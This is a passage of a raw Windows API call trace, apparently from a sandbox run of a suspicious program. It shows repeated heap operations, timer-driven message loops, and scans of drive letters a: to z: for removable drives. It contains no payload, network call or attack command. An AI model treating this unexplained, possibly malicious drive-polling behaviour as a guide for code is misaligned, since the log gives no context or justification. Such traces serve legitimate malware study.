hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.072] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0220.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0220.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0220.073] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.074] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0220.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.074] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.239] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.240] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0220.240] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0220.240] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.241] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.241] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.241] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.241] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.241] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.242] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.242] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.242] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.242] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.243] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.243] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.243] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.243] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.244] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.244] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.244] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.244] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.245] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.245] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.245] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.245] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.246] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.246] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.246] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.246] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.247] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.247] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.247] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.247] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.248] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.248] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.248] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.249] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.249] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.249] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0220.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0220.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.250] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.250] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.250] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.251] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.251] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.251] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.251] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.251] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0220.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0220.251] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0220.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0220.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0220.253] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.253] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.253] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.253] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0220.254] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0220.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.254] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.254] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.255] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.255] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.255] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.255] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.255] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.256] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.256] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.256] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.256] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.256] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.257] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.257] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.257] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.257] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.258] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.258] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.258] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.258] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.259] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.259] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.259] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.259] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.259] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.260] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.260] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0220.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.261] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0220.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.262] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0220.262] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0220.262] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.262] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.262] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.262] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.262] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.263] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0220.263] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.263] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0220.263] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0220.263] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.263] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.264] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.264] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.264] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.264] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.264] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.265] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.265] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.265] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.265] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.265] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.266] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.266] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.266] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.266] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.266] GetDriveTypeW 